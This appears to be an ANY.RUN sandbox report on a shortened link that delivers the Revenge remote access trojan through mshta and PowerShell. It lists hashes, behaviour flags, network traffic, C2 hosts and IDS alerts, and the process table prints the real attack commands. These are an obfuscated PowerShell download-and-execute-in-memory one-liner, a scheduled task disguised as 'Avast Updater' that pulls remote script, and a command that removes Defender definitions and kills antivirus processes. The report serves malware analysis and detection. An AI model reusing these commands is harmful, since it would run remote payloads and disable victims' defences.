analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://www.bitly.com/LdsaKLX9gTSDLX

Full analysis: https://app.any.run/tasks/10b2fb87-8abe-47e6-9aa6-4b80e13e09d7
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: July 17, 2019, 15:18:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
rat
revenge
Indicators:
MD5:

463C1A2761A5DA79478447252A8EC53B

SHA1:

7D03DC7BBB743B282366F48A5DB550B113636556

SHA256:

53A36BC8B72683464AF6FA98CBC25B0A75B84999641674234E9A47ADC59D3FC2

SSDEEP:

3:N1KJS4slKlhT:Cc4sUP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • mshta.exe (PID: 2740)
    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 2740)
    • Executes PowerShell scripts

      • mshta.exe (PID: 2740)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3560)
    • REVENGE was detected

      • powershell.exe (PID: 3348)
    • Uses TASKKILL.EXE to kill antiviruses

      • cmd.exe (PID: 944)
    • Connects to CnC server

      • powershell.exe (PID: 3348)
  • SUSPICIOUS

    • Application launched itself

      • mshta.exe (PID: 3928)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 3224)
      • mshta.exe (PID: 3928)
    • Creates files in the user directory

      • mshta.exe (PID: 3928)
      • mshta.exe (PID: 2740)
      • powershell.exe (PID: 3348)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 2740)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 944)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 944)
  • INFO

    • Creates files in the user directory

      • iexplore.exe (PID: 3676)
    • Application launched itself

      • iexplore.exe (PID: 3436)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3676)
      • mshta.exe (PID: 3928)
      • mshta.exe (PID: 2740)
      • iexplore.exe (PID: 2976)
    • Changes internet zones settings

      • iexplore.exe (PID: 3436)
      • iexplore.exe (PID: 1960)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3676)
      • iexplore.exe (PID: 2976)
    • Manual execution by user

      • cmd.exe (PID: 3224)
      • iexplore.exe (PID: 1960)
      • explorer.exe (PID: 3936)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3348)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
18
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe cmd.exe no specs mshta.exe mshta.exe cmd.exe no specs #REVENGE powershell.exe schtasks.exe no specs mpcmdrun.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs explorer.exe no specs iexplore.exe iexplore.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3436"C:\Program Files\Internet Explorer\iexplore.exe" "http://www.bitly.com/LdsaKLX9gTSDLX"C:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3676"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3436 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3224"C:\Windows\system32\cmd.exe" C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3928mshta http://www.bitly.com/LdsaKLX9gTSDLXC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2740"C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/k7dnVz2VC:\Windows\System32\mshta.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
944"C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im MSASCuiL.exe & taskkill /f /im MpCmdRun.exe & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3348"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOEx $SA_s = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/0v8Vj4u0'));$SA_s=$SA_s.replace('.','0');$SA_s = $SA_s.ToCharArray();[Array]::Reverse($SA_s);[byte[]]$Ci_W = [System.Convert]::FromBase64String($SA_s);$ASD_w = [System.Threading.Thread]::GetDomain().Load($Ci_W);$ASD_w.EntryPoint.invoke($S,$X);C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3560"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Avast Updater" /tr "mshta.exe http://pastebin.com/raw/NwPxvrRM" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2532MpCmdRun.exe -removedefinitions -dynamicsignatures C:\Program Files\Windows Defender\MpCmdRun.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Malware Protection Command Line Utility
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3968taskkill /f /im winword.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 349
Read events
1 092
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
28
Unknown types
3

Dropped files

PID
Process
Filename
Type
3436iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico
MD5:
SHA256:
3436iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
3928mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\authorization[1].css
MD5:
SHA256:
3676iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@bitly[1].txttext
MD5:E91948560925578685CEC7378F11FF88
SHA256:04B82750BA29478E3F8B5447F772DDF7BE8B1683FBF486BA2DD28FFA67BD0024
3928mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txttext
MD5:5A4347D0B80AAC5A0494C8B66F622CB5
SHA256:2AD7D12E8FFA3DF87156FCDF7FAE65758285895DD7F9B7C31AA0EEBE2AA22418
3676iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\KNU9NFJK\10[1].htmlhtml
MD5:BD46A729E25B48E9C880F541DE27B67D
SHA256:3790625C48558767401619159BC7C8EB0CA0E4A184D3B516261BDA302717FC9B
3676iexplore.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.datdat
MD5:6603BB7E8AA74EAF90E96909EDD5E00A
SHA256:A9BC70292D4D1FFB41573EF54C6C9E3F4771DE04E984FADE369AC9D2650E53CB
3676iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3676iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:FEBDF32A7F963605ECC21FE397C4F5CD
SHA256:66CD4905A1264A3E96502A7016600FAA905B29CAECFAF5AC4D0C87B0E34A948B
3676iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.datdat
MD5:166BD3D6A535EFA9E0C5EFD7FA8F49A9
SHA256:35E8E4606416F636D228094F20963A2CCC7AE3CFD7D10F29AD388A46D117ACCE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
20
DNS requests
10
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3676
iexplore.exe
GET
301
67.199.248.14:80
http://bitly.com/LdsaKLX9gTSDLX
US
html
130 b
shared
3928
mshta.exe
GET
301
67.199.248.14:80
http://bitly.com/LdsaKLX9gTSDLX
US
html
130 b
shared
2740
mshta.exe
GET
301
104.20.209.21:80
http://www.pastebin.com/raw/k7dnVz2V
US
html
6.55 Kb
shared
3928
mshta.exe
GET
301
67.199.248.14:80
http://www.bitly.com/LdsaKLX9gTSDLX
US
html
178 b
shared
3436
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
3676
iexplore.exe
GET
301
67.199.248.14:80
http://www.bitly.com/LdsaKLX9gTSDLX
US
html
178 b
shared
1960
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3436
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3676
iexplore.exe
67.199.248.14:80
www.bitly.com
Bitly Inc
US
shared
3676
iexplore.exe
172.217.22.73:443
www.blogger.com
Google Inc.
US
whitelisted
3928
mshta.exe
67.199.248.14:80
www.bitly.com
Bitly Inc
US
shared
3928
mshta.exe
216.58.207.65:443
dqawqdnqiddx.blogspot.com
Google Inc.
US
whitelisted
3676
iexplore.exe
216.58.207.65:443
dqawqdnqiddx.blogspot.com
Google Inc.
US
whitelisted
3928
mshta.exe
216.58.207.41:443
resources.blogblog.com
Google Inc.
US
whitelisted
3348
powershell.exe
104.20.208.21:443
www.pastebin.com
Cloudflare Inc
US
shared
216.58.207.41:443
resources.blogblog.com
Google Inc.
US
whitelisted
2740
mshta.exe
104.20.209.21:80
www.pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
www.bitly.com
  • 67.199.248.14
  • 67.199.248.15
shared
dqawqdnqiddx.blogspot.com
  • 216.58.207.65
whitelisted
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.blogger.com
  • 172.217.22.73
shared
resources.blogblog.com
  • 216.58.207.41
whitelisted
www.pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
pastebin.com
  • 104.20.208.21
  • 104.20.209.21
shared
arabkrobo.duckdns.org
  • 147.78.221.21
malicious

Threats

PID
Process
Class
Message
3928
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
3928
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2740
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3348
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Revenge-RAT CnC Checkin
3348
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
3348
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3348
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3348
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
3348
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response
9 ETPRO signatures available at the full report
No debug info